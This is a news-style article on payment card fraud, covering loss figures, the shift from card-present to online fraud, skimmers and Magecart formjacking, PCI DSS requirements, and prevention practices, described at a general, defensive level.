Payment cards make purchasing convenient not only for consumers and businesses, but for fraudsters, too. Global fraud losses from payment cards in 2018 reached $27.85 billion, according to the latest numbers from The Nilson Report, a card and mobile payments trade publication. As large as those losses are, they only amount to $10.83 for every $100 of spending by credit card users, which is actually lower than the previous year, $11.12 per $100.
That may be why credit card issuers believe they have fraud under control. “What worries most credit card sponsors more than fraud is unfairly blocking a consumer’s legitimate transaction,” says Roger Grimes, a defense evangelist at KnowBe4, a security awareness training provider. “Most of the evolving and newer systems aren’t trying to detect credit card fraud better. What they are trying to do better is prevent losing customers from blocking legitimate transactions. So, shockingly, most of the activity is in preventing ‘false-positives’ and not in actually decreasing real fraud.”
Fraud has a limited immediate impact on consumers and businesses. If a number is compromised and a thief goes on a spending spree, liability is limited to $50.
Consumers and businesses might see fraud costs down the road in the form of increased prices for goods and services as merchants and credit card issuers pass on the cost of losses. “Ultimately, some amount of fraud will always exist for as long as we continue to use credit cards,” observes Paul Bischoff, a privacy advocate at Comparitech.com, an information website for consumer security products. “A large part of the interest payments we all make on credit cards goes toward compensating for fraud.”
Credit card fraud scope and trends
Card issuers have boosted the security of their physical cards through the use of EMV PIN and chip technology. “EMV was a big leap forward,” says Greg Hancell, senior manager at OneSpan, a provider of anti-fraud and digital transaction management solutions. “In countries that adopted the technology, card-present fraud disappeared overnight. The problem was it went online, and card-not-present fraud increased.”
A study released by the Federal Reserve in 2018 noted that a year after EMV cards began to be issued in the United States, card-present fraud—fraud where a physical credit card was used for the fraudulent transaction—dropped to $2.91 billion in 2016 from $3.68 billion in 2015. Meanwhile, during the same period, card-not-present fraud—fraud where a credit card number is used over the phone or in an online transaction—jumped to $4.57 billion from $3.4 billion. Online fraud has continued to grow until now card-not-present fraud is 81% more likely to occur than card-present fraud, according to Javelin Strategy & Research.
However, the adoption of EMV technology hasn’t been consistent globally, which has opened the door for some global bandits. Organized crime groups can plant radio-enabled skimmers—a hardware device for capturing credit card information without a user’s knowledge—in ATMs or point-of-sale terminals in a country supporting EMV and send data from those skimmers to accomplices in a country without EMV support. “They can take that information and print a card in under a minute. Then they will use that card without worrying about EMV,” Hancell said.
He adds that card-not-present attacks might become broader threats because they can be scaled up with automation. “With a skimmer on a single machine, you run the risk of only a few people visiting the machine, or the skimmer being quickly discovered,” Hancell explains. “In the card-not-present world, you can send out a phishing attack to a target range of victims that will encourage them to provide you with credit card details or will infect them with malware and steal their details that way.”
Uri Arad, co-founder and vice president of product at Identiq, operator of a peer-to-peer user identification network, added that professional fraudsters often prefer to work at scale. “They want to maximize their ROI and may well use botnets to attack as many sites as quickly as possible, as well as programs to automatically rifle through new identities and matching IPs quickly and easily for each new attack,” he says.
As fraud detection systems get more sophisticated, online swindlers are going to greater lengths to obscure their activity. “They will try to mask their IPs using proxies of various kinds,” Arad says.
“More sophisticated fraudsters will even aim for IPs in close proximity to the billing address of the stolen card they plan to use,” Arad continues. “Similarly, they may use emulators to appear to be coming from a mobile device, change the time on their computer to match the relevant time zone, or use virtual machines or wiped or jailbroken devices to appear to come from a clean machine.”
Credit card fraud has become such a large enterprise and is so sophisticated that it has begun to take on the characteristics of legitimate businesses. For example, clear divisions in labor have developed. “What we have seen via many of the recent data-breaches for the last few years is a large, organized and coordinated series of hand-offs between malware creators to those who breach the payment systems to those that package and sell the breached credit card information,” says Bryan Jardine, director of product management at AppGate, a developer and provider of security and analytics products and services.
Jardine adds that digital wallets have also been targeted by credit card thieves. “Stolen credit card information sold on the black markets is used to load balances into these non-deposit accounts,” he explains. “Then the balances are transferred to another individual in peer-to-peer payments, who buys gift cards or pre-paid cards that cannot be tied to an individual when used. These payment style cards can then be used with complete anonymity online.”
The Russian-speaking underground was a leader in credit card theft in the early 2000s and continues to be in the forefront of fraud, building a cybercrime-as-a-service model. “They have created end-to-end services for experienced to novice cybercriminals that has expedited the evolution of exploitation techniques,” says Ed Cabrera, chief cybersecurity officer at Trend Micro, a maker of enterprise cybersecurity solutions.
Purchasing habits of fraudsters have changed over the years, too. They’re shying away from physical goods, which can be difficult to convert into cash and easy to track by law enforcement. “Usually they purchase intangible things that are more difficult to trace, such as gift cards, crypto currencies, and digital goods. They might also try to reap the rewards from a card’s points program,” Comparitech’s Bischoff says.
Credit card thieves, though, may be victims of their own success. “Evidence suggests that there is an oversupply of stolen credit cards and not enough demand from criminals who want to use them,” Bischoff says. “This has driven the price of stolen credit cards on the dark web down to just a few dollars each.”
Types of payment card fraud
If a malicious actor obtains credentials to an account, they can purchase items through any payment cards tied to that account. They can also check out the profile of the account holder, copy any credit information stored there, and use it to buy stuff outside the account. For example, if someone compromises an Amazon account, they can buy goods with any form of payment associated with the account and add an address where the items should be shipped.
Credentials used to compromise accounts can be obtained in several ways: purchased on the dark web or captured by deception. “A person gets an email or text alert that something’s wrong with their account. They follow a link and are sent to a fake site to log in their credentials, which the attackers then use to own account,” says Deb Radcliff, an evangelist at Bolster Security, a maker of an online fraud prevention solution.
Skimmers and shimmers
Skimmers capture payment card information on a card’s magnetic strip. Shimmers snatch data from EMV cards. These are usually hardware devices placed on ATM or point-of-purchase terminals designed to steal information used to complete a legitimate transaction. Since planting hardware can be labor intensive, fraudsters often take the malware route and infect point of sale (POS) systems that way.
This has become a popular form of online fraud largely due to Magecart, which consists of at least seven criminal groups that have infected shopping carts at thousands of e-commerce sites with skimming malware. Among the gang’s high visibility targets have been Ticketmaster, British Airways, and Newegg.
“Formjacking is one of the most used techniques,” says Mounir Hahad, head of the threat lab for Juniper Networks, a network security and performance company. “A malicious script is injected into the payment page of a compromised merchant’s site, siphons off credit card information entered by unsuspecting shoppers, and sends it to the attackers.”
Flaws in software can be exploited to steal all kinds of information from devices, including credit card data. For example, Magecart attacks exploit a bug in MAGMI, a plug-in for Magneto-based online stores, to plant malicious code at a site that leads to the theft of payment information.
It seems that no matter how often users are warned about clicking on links in emails, they continue to do so. Clicking on such links usually leads to a malicious website that tries to pry credit card data from a visitor or plant malware on their computer. “Malware can range from a simple keylogger that steals all text to a more complex style that specifically looks and parses out credit card and related data,” says Melody J. Kaufman, a cybersecurity specialist with Saviynt, an application and infrastructure security provider.
Unscrupulous employees at financial institutions, credit card manufacturers, restaurants, retailers or just about anyone who handles credit cards can engage in fraud.
Organizations that handle credit cards from the major providers must comply with the Payment Card Industry Data Security Standard (PCI DSS). Merchants, ISVs and anyone who stores, processes, transmits or otherwise manipulates cardholder data, as well as service providers who can affect the security of cardholder data must meet the requirements of PCI DSS, including:
- Install and maintain a firewall configuration to protect cardholder data.
- Do not use vendor-supplied defaults for system passwords and other security parameters.
- Protect stored cardholder data.
- Encrypt transmission of cardholder data across open, public networks.
- Use and regularly update anti-virus software or programs.
- Develop and maintain secure systems and applications.
- Restrict access to cardholder data by business need to know.
- Assign a unique ID to each person with computer access.
- Restrict physical access to cardholder data.
- Track and monitor all access to network resources and cardholder data.
- Regularly test security systems and processes.
- Maintain a policy that addresses information security for all personnel.
“The PCI has done a lot to help organizations secure their own credit card transactions and storage of card data through mandated controls, penetration tests and yearly audits,” Saviynt’s Kaufman says.
“While this does not limit fraudulent transactions,” she continued, “it does make it harder to compromise a card processor and walk away with thousands of cards, which does limit the potential for fraud.”
Industry groups have begun to explore deeper forms of collaboration to address their fraud problems. “Many of these projects have been stymied by the problem of data sharing, but new providerless options have started to emerge to enable collaboration on a data level without actually sharing any personal user data at all,” Identiq’s Arad says. “The more closely companies and industry organizations can work together, the more effectively they can combat fraudsters, so it will be very interesting to see how this develops.”
Mitigating credit card fraud
These are some of the recognized best practices for preventing payment card fraud:
- Encrypt databases that hold credit card data.
- Put recurring checks in place for ecommerce server communications with known command-and-control servers used by skimmers.
- Regularly scan your ecommerce sites for vulnerabilities and malware.
- Vet third-party code loaded by partners and content delivery networks for malware.
- Keep shopping cart software and other services up-to-date and patched.
- Use strong administrative passwords and limit access to the administrative portal for ecommerce websites.
- Monitor the dark web for stolen card data.
- Use anomaly detection software to identify and flag suspicious activity.
- Encourage customers to opt for multi-factor authentication, especially for changes to personal and payment information.
- Educate customers about how to identify signs that their payment cards have been compromised. Make it easy for them to report suspicious activity.